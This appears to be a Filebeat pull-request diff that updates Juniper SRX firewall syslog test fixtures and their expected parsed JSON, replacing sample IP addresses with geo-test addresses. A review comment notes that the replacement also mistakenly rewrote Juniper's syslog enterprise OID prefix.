APPTRACK_SESSION_VOL_UPDATE [junos@2636.1.1.1.2.129 source-address="10.1.1.100" source-port="58943" destination-address="46.165.154.241" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="172.19.34.100" nat-source-port="6018" nat-destination-address="46.165.154.241" nat-destination-port="80" src-nat-rule-name="our-nat-rule" dst-nat-rule-name="N/A" protocol-id="6" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="16118" packets-from-client="42" bytes-from-client="2322" packets-from-server="34" bytes-from-server="2132" elapsed-time="60" username="N/A" roles="N/A" encrypted="No" destination-interface-name="ge-0/0/0.0" category="N/A" sub-category="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"] -<14>1 2020-07-13T16:43:05.041Z SRX100HM 
RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason="idle Timeout" source-address="10.1.1.100" source-port="64720" destination-address="91.228.167.172" destination-port="8883" connection-tag="0" service-name="None" nat-source-address="172.19.34.100" nat-source-port="24519" nat-destination-address="91.228.167.172" nat-destination-port="8883" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="our-nat-rule" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="3851" packets-from-client="161" bytes-from-client="9530" packets-from-server="96" bytes-from-server="9670" elapsed-time="23755" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/1.0" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A" secure-web-proxy-session-type="NA" peer-session-id="0" peer-source-address="0.0.0.0" peer-source-port="0" peer-destination-address="0.0.0.0" peer-destination-port="0" hostname="NA NA" src-vrf-grp="N/A" dst-vrf-grp="N/A"] -<14>1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.129 source-address="10.1.1.100" source-port="49583" destination-address="8.8.8.8" destination-port="53" connection-tag="0" service-name="junos-dns-udp" nat-source-address="172.19.34.100" nat-source-port="30838" nat-destination-address="8.8.8.8" nat-destination-port="53" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="our-nat-rule" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="15399" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/1.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" 
application-sub-category="N/A" application-risk="1" application-characteristics="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"] -<14>1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason="Closed by junos-alg" source-address="10.1.1.100" source-port="63381" destination-address="8.8.8.8" destination-port="53" service-name="junos-dns-udp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="172.19.34.100" nat-source-port="26764" nat-destination-address="8.8.8.8" nat-destination-port="53" src-nat-rule-name="our-nat-rule" dst-nat-rule-name="N/A" protocol-id="17" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="15361" packets-from-client="1" bytes-from-client="66" packets-from-server="1" bytes-from-server="82" elapsed-time="3" username="N/A" roles="N/A" encrypted="No" profile-name="N/A" rule-name="N/A" routing-instance="default" destination-interface-name="ge-0/0/0.0" uplink-incoming-interface-name="N/A" uplink-tx-bytes="0" uplink-rx-bytes="0" category="N/A" sub-category="N/A" apbr-policy-name="N/A" multipath-rule-name="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"] +<14>1 2019-04-12T14:29:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.81.2.69.144.129 reason="TCP FIN" source-address="10.3.255.203" source-port="47776" destination-address="8.23.224.110" destination-port="80" connection-tag="0" service-name="junos-http" nat-source-address="10.3.136.49" nat-source-port="19162" nat-destination-address="8.23.224.110" nat-destination-port="80" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="nat1" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit_all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="5" packets-from-client="6" bytes-from-client="337" packets-from-server="4" bytes-from-server="535" elapsed-time="1" application="HTTP" nested-application="UNKNOWN" username="N/A" 
roles="N/A" packet-incoming-interface="ge-0/0/0.0" encrypted="No" application-category="Web" application-sub-category="N/A" application-risk="4" application-characteristics="Can Leak Information;Supports File Transfer;Prone to Misuse;Known Vulnerabilities;Carrier of Malware;Capable of Tunneling;"] +<14>1 2019-04-13T14:33:06.576Z cixi RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.81.2.69.144.58 reason="TCP RST" source-address="192.168.2.164" source-port="53232" destination-address="172.16.1.19" destination-port="445" service-name="junos-smb" nat-source-address="192.168.2.164" nat-source-port="53232" nat-destination-address="172.16.1.19" nat-destination-port="445" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="6" policy-name="35" source-zone-name="Trust" destination-zone-name="Trust" session-id-32="206" packets-from-client="13" bytes-from-client="4274" packets-from-server="9" bytes-from-server="1575" elapsed-time="16" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/2.0"] +<14>1 2018-10-07T01:32:20.898Z TestFW2 RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.81.2.69.144.34 reason="idle Timeout" source-address="67.43.156.14" source-port="52890" destination-address="58.68.126.198" destination-port="53" service-name="junos-dns-udp" nat-source-address="58.78.140.131" nat-source-port="11152" nat-destination-address="58.68.126.198" nat-destination-port="53" src-nat-rule-type="source rule" src-nat-rule-name="NAT_S" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="NAT" source-zone-name="Gi_nat" destination-zone-name="Internet" session-id-32="220368889" packets-from-client="1" bytes-from-client="72" packets-from-server="1" bytes-from-server="136" elapsed-time="8" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth0.108" encrypted="UNKNOWN"] +<14>1 2018-06-30T02:17:22.753Z fw0001 RT_FLOW - RT_FLOW_SESSION_CLOSE 
[junos@2636.81.2.69.144.41 reason="idle Timeout" source-address="192.168.255.2" source-port="62047" destination-address="175.16.199.1" destination-port="53" service-name="junos-dns-udp" nat-source-address="192.168.0.47" nat-source-port="20215" nat-destination-address="175.16.199.1" nat-destination-port="53" src-nat-rule-type="source rule" src-nat-rule-name="rule001" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="trust-to-untrust-001" source-zone-name="trust" destination-zone-name="untrust" session-id-32="9621" packets-from-client="1" bytes-from-client="67" packets-from-server="1" bytes-from-server="116" elapsed-time="3" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="fe-0/0/1.0" encrypted="UNKNOWN"]
+<14>1 2015-09-25T14:19:53.846Z VPNBox-A RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.81.2.69.144.36 reason="application failure or action" source-address="10.164.110.223" source-port="9057" destination-address="10.104.12.161" destination-port="21" service-name="junos-ftp" nat-source-address="10.9.1.150" nat-source-port="58020" nat-destination-address="10.12.70.1" nat-destination-port="21" src-nat-rule-name="SNAT-Policy5" dst-nat-rule-name="NAT-Policy10" protocol-id="6" policy-name="FW-FTP" source-zone-name="trust" destination-zone-name="untrust" session-id-32="24311" packets-from-client="0" bytes-from-client="0" packets-from-server="0" bytes-from-server="0" elapsed-time="1" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="reth0.0" encrypted="No "]
+<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CREATE [junos@2636.81.2.69.144.41 source-address="67.43.156.12" source-port="3129" destination-address="207.17.137.56" destination-port="21" service-name="junos-ftp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="173.167.224.7" nat-source-port="14406" nat-destination-address="207.17.137.56" 
nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" username="N/A" roles="N/A" encrypted="N/A"]
+<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.81.2.69.144.41 source-address="67.43.156.12" source-port="3129" destination-address="207.17.137.56" destination-port="21" service-name="junos-ftp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="173.167.224.7" nat-source-port="14406" nat-destination-address="207.17.137.56" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" packets-from-client="1" bytes-from-client="48" packets-from-server="0" bytes-from-server="0" elapsed-time="0" username="N/A" roles="N/A" encrypted="N/A"]
+<14>1 2013-01-19T15:18:17.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.81.2.69.144.41 reason="application failure or action" source-address="67.43.156.12" source-port="3129" destination-address="207.17.137.56" destination-port="21" service-name="junos-ftp" application="FTP" nested-application="UNKNOWN" nat-source-address="173.167.224.7" nat-source-port="14406" nat-destination-address="207.17.137.56" nat-destination-port="21" src-nat-rule-name="1" dst-nat-rule-name="None" protocol-id="6" policy-name="General-Outbound" source-zone-name="LAN" destination-zone-name="Danger" session-id-32="5058" packets-from-client="3" bytes-from-client="144" packets-from-server="2" bytes-from-server="104" elapsed-time="1" username="N/A" roles="N/A" encrypted="N/A"]
+<14>1 2013-01-19T15:18:18.040 SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.81.2.69.144.129 source-address="67.43.156.12" source-port="33040" destination-address="5.0.0.1" destination-port="80" service-name="junos-http" application="HTTP" 
nested-application="FACEBOOK-SOCIALRSS" nat-source-address="67.43.156.12" nat-source-port="33040" nat-destination-address="5.0.0.1" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="28" packets-from-client="371" bytes-from-client="19592" packets-from-server="584" bytes-from-server="686432" elapsed-time="60" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”]
+<14>1 2013-01-19T15:18:19.040 SRX100HM RT_FLOW - APPTRACK_SESSION_ROUTE_UPDATE [junos@2636.81.2.69.144.129 source-address="67.43.156.12" source-port="33040" destination-address="5.0.0.1" destination-port="80" service-name="junos-http" application="HTTP" nested-application="FACEBOOK-SOCIALRSS" nat-source-address="67.43.156.12" nat-source-port="33040" nat-destination-address="5.0.0.1" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="28" username="user1" roles="DEPT1" encrypted="No" profile-name=”pf1” rule-name=”facebook1” routing-instance=”instance1” destination-interface-name=”st0.0” apbr-rule-type=”default”]
+<14>1 2013-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.81.2.69.144.129 reason="TCP CLIENT RST" source-address="67.43.156.12" source-port="48873" destination-address="5.0.0.1" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="67.43.156.12" nat-source-port="48873" nat-destination-address="5.0.0.1" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="32" packets-from-client="5" bytes-from-client="392" packets-from-server="3" bytes-from-server="646" 
elapsed-time="3" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”]
+<14>1 2020-11-04T16:23:09.264Z cixi RT_FLOW - RT_FLOW_SESSION_CREATE_LS [junos@2636.81.2.69.144.35 source-address="175.16.199.1" source-port="24065" destination-address="30.0.0.100" destination-port="768" service-name="icmp" nat-source-address="175.16.199.1" nat-source-port="24065" nat-destination-address="30.0.0.100" nat-destination-port="768" src-nat-rule-name="None" dst-nat-rule-name="None" protocol-id="1" policy-name="alg-policy" source-zone-name="untrust" destination-zone-name="trust" session-id-32="100000165" username="N/A" roles="N/A" packet-incoming-interface="reth2.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN"]
+<14>1 2020-11-14T11:12:46.573+01:00 SRX-GW1 RT_FLOW - RT_FLOW_SESSION_DENY_LS [junos@2636.81.2.69.144.134 source-address="10.0.0.26" source-port="37233" destination-address="10.128.0.1" destination-port="161" connection-tag="0" service-name="None" protocol-id="17" icmp-type="0" policy-name="MgmtAccess-trust-cleanup" source-zone-name="trust" destination-zone-name="junos-host" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface=".local..0" encrypted="No" reason="Denied by policy" session-id-32="7087" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A"]
+<14>1 2020-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE_LS [junos@2636.81.2.69.144.129 reason="TCP CLIENT RST" source-address="67.43.156.12" source-port="48873" destination-address="5.0.0.1" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="67.43.156.12" nat-source-port="48873" nat-destination-address="5.0.0.1" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" 
destination-zone-name="untrust" session-id-32="32" packets-from-client="5" bytes-from-client="392" packets-from-server="3" bytes-from-server="646" elapsed-time="3" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”]
+<14>1 2020-07-14T14:17:11.928Z SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.81.2.69.144.129 source-address="10.1.1.100" source-port="58943" destination-address="46.165.154.241" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="172.19.34.100" nat-source-port="6018" nat-destination-address="46.165.154.241" nat-destination-port="80" src-nat-rule-name="our-nat-rule" dst-nat-rule-name="N/A" protocol-id="6" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="16118" packets-from-client="42" bytes-from-client="2322" packets-from-server="34" bytes-from-server="2132" elapsed-time="60" username="N/A" roles="N/A" encrypted="No" destination-interface-name="ge-0/0/0.0" category="N/A" sub-category="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"]
+<14>1 2020-07-13T16:43:05.041Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.81.2.69.144.129 reason="idle Timeout" source-address="10.1.1.100" source-port="64720" destination-address="91.228.167.172" destination-port="8883" connection-tag="0" service-name="None" nat-source-address="172.19.34.100" nat-source-port="24519" nat-destination-address="91.228.167.172" nat-destination-port="8883" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="our-nat-rule" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="3851" packets-from-client="161" bytes-from-client="9530" packets-from-server="96" bytes-from-server="9670" elapsed-time="23755" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" 
packet-incoming-interface="ge-0/0/1.0" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A" secure-web-proxy-session-type="NA" peer-session-id="0" peer-source-address="0.0.0.0" peer-source-port="0" peer-destination-address="0.0.0.0" peer-destination-port="0" hostname="NA NA" src-vrf-grp="N/A" dst-vrf-grp="N/A"]
+<14>1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.81.2.69.144.129 source-address="10.1.1.100" source-port="49583" destination-address="175.16.199.1" destination-port="53" connection-tag="0" service-name="junos-dns-udp" nat-source-address="172.19.34.100" nat-source-port="30838" nat-destination-address="175.16.199.1" nat-destination-port="53" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="our-nat-rule" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="15399" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/1.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"]
+<14>1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.81.2.69.144.129 reason="Closed by junos-alg" source-address="10.1.1.100" source-port="63381" destination-address="175.16.199.1" destination-port="53" service-name="junos-dns-udp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="172.19.34.100" nat-source-port="26764" nat-destination-address="175.16.199.1" nat-destination-port="53" src-nat-rule-name="our-nat-rule" dst-nat-rule-name="N/A" protocol-id="17" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="15361" packets-from-client="1" bytes-from-client="66" 
packets-from-server="1" bytes-from-server="82" elapsed-time="3" username="N/A" roles="N/A" encrypted="No" profile-name="N/A" rule-name="N/A" routing-instance="default" destination-interface-name="ge-0/0/0.0" uplink-incoming-interface-name="N/A" uplink-tx-bytes="0" uplink-rx-bytes="0" category="N/A" sub-category="N/A" apbr-policy-name="N/A" multipath-rule-name="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"]
diff --git a/x-pack/filebeat/module/juniper/srx/test/flow.log-expected.json b/x-pack/filebeat/module/juniper/srx/test/flow.log-expected.json
index abc4961d5937..4f4f7275fbc3 100644
--- a/x-pack/filebeat/module/juniper/srx/test/flow.log-expected.json
+++ b/x-pack/filebeat/module/juniper/srx/test/flow.log-expected.json
@@ -93,7 +93,7 @@
 "juniper.srx.session_id_32": "7087",
 "juniper.srx.tag": "RT_FLOW_SESSION_DENY",
 "log.level": "informational",
- "log.offset": 850,
+ "log.offset": 854,
 "network.iana_number": "17",
 "observer.egress.zone": "junos-host",
 "observer.ingress.interface.name": ".local..0",
@@ -119,15 +119,8 @@
 },
 {
 "@timestamp": "2014-05-01T06:26:51.179-02:00",
- "client.ip": "1.2.3.4",
+ "client.ip": "81.2.69.143",
 "client.port": 56639,
- "destination.as.number": 6805,
- "destination.as.organization.name": "Telefonica Germany",
- "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "DE",
- "destination.geo.country_name": "Germany",
- "destination.geo.location.lat": 51.2993,
- "destination.geo.location.lon": 9.491,
 "destination.ip": "5.6.7.8",
 "destination.port": 2003,
 "event.action": "flow_deny", 
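Review bot: The `log.offset` change from 850 to 854 in the `@@ -93,7 +93,7 @@` hunk (and the growing deltas in the later offset hunks, +8, +16, +28, +36) means every preceding log line grew by at least four bytes, including lines whose addresses are all private and were not replaced; that is exactly the length difference between `1.1.1.2` and `81.2.69.144`, and the new side of flow.log does show `junos@2636.81.2.69.144.129`, `junos@2636.81.2.69.144.58`, `junos@2636.81.2.69.144.34` and so on where the removed line had `junos@2636.1.1.1.2.129`. `2636.1.1.1.2` in that SD-ID is Juniper's enterprise OID prefix in the syslog structured-data element, not an IP address, so the address-sanitising pass appears to have rewritten it by mistake and the fixture no longer matches what a real device emits. I would restore `junos@2636.1.1.1.2.NN` in flow.log and regenerate this expected file; the `log.offset` values in this and the following hunks would then change again, which is expected.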
@@ -137,7 +130,7 @@
 "event.dataset": "juniper.srx",
 "event.kind": "event",
 "event.module": "juniper",
- "event.original": "source-address=\"1.2.3.4\" source-port=\"56639\" destination-address=\"5.6.7.8\" destination-port=\"2003\" service-name=\"None\" protocol-id=\"6\" icmp-type=\"0\" policy-name=\"log-all-else\" source-zone-name=\"campus\" destination-zone-name=\"mngmt\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth6.0\" encrypted=\"No \"",
+ "event.original": "source-address=\"81.2.69.143\" source-port=\"56639\" destination-address=\"5.6.7.8\" destination-port=\"2003\" service-name=\"None\" protocol-id=\"6\" icmp-type=\"0\" policy-name=\"log-all-else\" source-zone-name=\"campus\" destination-zone-name=\"mngmt\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth6.0\" encrypted=\"No \"",
 "event.outcome": "success",
 "event.severity": 14,
 "event.timezone": "-02:00",
@@ -152,7 +145,7 @@
 "juniper.srx.process": "RT_FLOW",
 "juniper.srx.tag": "RT_FLOW_SESSION_DENY",
 "log.level": "informational",
- "log.offset": 1513,
+ "log.offset": 1521,
 "network.iana_number": "6",
 "observer.egress.zone": "mngmt",
 "observer.ingress.interface.name": "reth6.0", 
@@ -162,22 +155,22 @@
 "observer.type": "firewall",
 "observer.vendor": "Juniper",
 "related.ip": [
- "1.2.3.4",
- "5.6.7.8"
+ "5.6.7.8",
+ "81.2.69.143"
 ],
 "rule.name": "log-all-else",
 "server.ip": "5.6.7.8",
 "server.port": 2003,
 "service.type": "juniper",
- "source.geo.city_name": "Moscow",
+ "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "RU",
- "source.geo.country_name": "Russia",
- "source.geo.location.lat": 55.7527,
- "source.geo.location.lon": 37.6172,
- "source.geo.region_iso_code": "RU-MOW",
- "source.geo.region_name": "Moscow",
- "source.ip": "1.2.3.4",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "source.port": 56639,
 "tags": [
 "forwarded",
@@ -187,18 +180,11 @@
 {
 "@timestamp": "2014-05-01T06:28:10.933-02:00",
 "client.bytes": 94,
- "client.ip": "1.2.3.4",
+ "client.ip": "81.2.69.143",
 "client.nat.port": 63456,
 "client.packets": 1,
 "client.port": 63456,
- "destination.as.number": 6805,
- "destination.as.organization.name": "Telefonica Germany",
 "destination.bytes": 0,
- "destination.geo.continent_name": "Europe",
- "destination.geo.country_iso_code": "DE",
- "destination.geo.country_name": "Germany",
- "destination.geo.location.lat": 51.2993,
- "destination.geo.location.lon": 9.491,
 "destination.ip": "5.6.7.8",
 "destination.nat.ip": "5.6.7.8",
 "destination.nat.port": 902, 
@@ -213,7 +199,7 @@
 "event.end": "2014-05-01T06:29:10.933-02:00",
 "event.kind": "event",
 "event.module": "juniper",
- "event.original": "reason=\"unset\" source-address=\"1.2.3.4\" source-port=\"63456\" destination-address=\"5.6.7.8\" destination-port=\"902\" service-name=\"None\" nat-source-address=\"1.2.3.4\" nat-source-port=\"63456\" nat-destination-address=\"5.6.7.8\" nat-destination-port=\"902\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"17\" policy-name=\"mngmt-to-vcenter\" source-zone-name=\"mngmt\" destination-zone-name=\"intra\" session-id-32=\"15353\" packets-from-client=\"1\" bytes-from-client=\"94\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"60\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth3.5\" encrypted=\"No \"",
+ "event.original": "reason=\"unset\" source-address=\"81.2.69.143\" source-port=\"63456\" destination-address=\"5.6.7.8\" destination-port=\"902\" service-name=\"None\" nat-source-address=\"81.2.69.143\" nat-source-port=\"63456\" nat-destination-address=\"5.6.7.8\" nat-destination-port=\"902\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"17\" policy-name=\"mngmt-to-vcenter\" source-zone-name=\"mngmt\" destination-zone-name=\"intra\" session-id-32=\"15353\" packets-from-client=\"1\" bytes-from-client=\"94\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"60\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth3.5\" encrypted=\"No \"",
 "event.outcome": "success",
 "event.severity": 14,
 "event.start": "2014-05-01T06:28:10.933-02:00",
@@ -231,7 +217,7 @@
 "juniper.srx.session_id_32": "15353",
 "juniper.srx.tag": "RT_FLOW_SESSION_CLOSE",
 "log.level": "informational",
- "log.offset": 1966,
+ "log.offset": 1982,
 "network.bytes": 94,
 "network.iana_number": "17",
 "network.packets": 1, 
@@ -243,8 +229,8 @@
 "observer.type": "firewall",
 "observer.vendor": "Juniper",
 "related.ip": [
- "1.2.3.4",
- "5.6.7.8"
+ "5.6.7.8",
+ "81.2.69.143"
 ],
 "rule.name": "mngmt-to-vcenter",
 "server.bytes": 0,
@@ -254,16 +240,16 @@
 "server.port": 902,
 "service.type": "juniper",
 "source.bytes": 94,
- "source.geo.city_name": "Moscow",
+ "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "RU",
- "source.geo.country_name": "Russia",
- "source.geo.location.lat": 55.7527,
- "source.geo.location.lon": 37.6172,
- "source.geo.region_iso_code": "RU-MOW",
- "source.geo.region_name": "Moscow",
- "source.ip": "1.2.3.4",
- "source.nat.ip": "1.2.3.4",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
+ "source.nat.ip": "81.2.69.143",
 "source.nat.port": 63456,
 "source.packets": 1,
 "source.port": 63456,
@@ -274,14 +260,9 @@
 },
 {
 "@timestamp": "2013-11-04T14:23:09.264-02:00",
- "client.ip": "50.0.0.100",
+ "client.ip": "175.16.199.1",
 "client.nat.port": 24065,
 "client.port": 24065,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.ip": "30.0.0.100",
 "destination.nat.ip": "30.0.0.100",
 "destination.nat.port": 768, 
@@ -293,7 +274,7 @@
 "event.dataset": "juniper.srx",
 "event.kind": "event",
 "event.module": "juniper",
- "event.original": "source-address=\"50.0.0.100\" source-port=\"24065\" destination-address=\"30.0.0.100\" destination-port=\"768\" service-name=\"icmp\" nat-source-address=\"50.0.0.100\" nat-source-port=\"24065\" nat-destination-address=\"30.0.0.100\" nat-destination-port=\"768\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"alg-policy\" source-zone-name=\"untrust\" destination-zone-name=\"trust\" session-id-32=\"100000165\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth2.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\"",
+ "event.original": "source-address=\"175.16.199.1\" source-port=\"24065\" destination-address=\"30.0.0.100\" destination-port=\"768\" service-name=\"icmp\" nat-source-address=\"175.16.199.1\" nat-source-port=\"24065\" nat-destination-address=\"30.0.0.100\" nat-destination-port=\"768\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"alg-policy\" source-zone-name=\"untrust\" destination-zone-name=\"trust\" session-id-32=\"100000165\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth2.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\"",
 "event.outcome": "success",
 "event.severity": 14,
 "event.timezone": "-02:00",
@@ -309,7 +290,7 @@
 "juniper.srx.session_id_32": "100000165",
 "juniper.srx.tag": "RT_FLOW_SESSION_CREATE",
 "log.level": "informational",
- "log.offset": 2721,
+ "log.offset": 2749,
 "network.iana_number": "1",
 "observer.egress.zone": "trust",
 "observer.ingress.interface.name": "reth2.0", 
@@ -319,21 +300,24 @@
 "observer.type": "firewall",
 "observer.vendor": "Juniper",
 "related.ip": [
- "30.0.0.100",
- "50.0.0.100"
+ "175.16.199.1",
+ "30.0.0.100"
 ],
 "rule.name": "alg-policy",
 "server.ip": "30.0.0.100",
 "server.nat.port": 768,
 "server.port": 768,
 "service.type": "juniper",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 37.751,
- "source.geo.location.lon": -97.822,
- "source.ip": "50.0.0.100",
- "source.nat.ip": "50.0.0.100",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
+ "source.nat.ip": "175.16.199.1",
 "source.nat.port": 24065,
 "source.port": 24065,
 "tags": [
@@ -346,11 +330,8 @@
 "client.ip": "192.0.2.1",
 "client.nat.port": 1,
 "client.port": 1,
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
+ "destination.as.number": 3,
+ "destination.as.organization.name": "Massachusetts Institute of Technology",
 "destination.ip": "198.51.100.12",
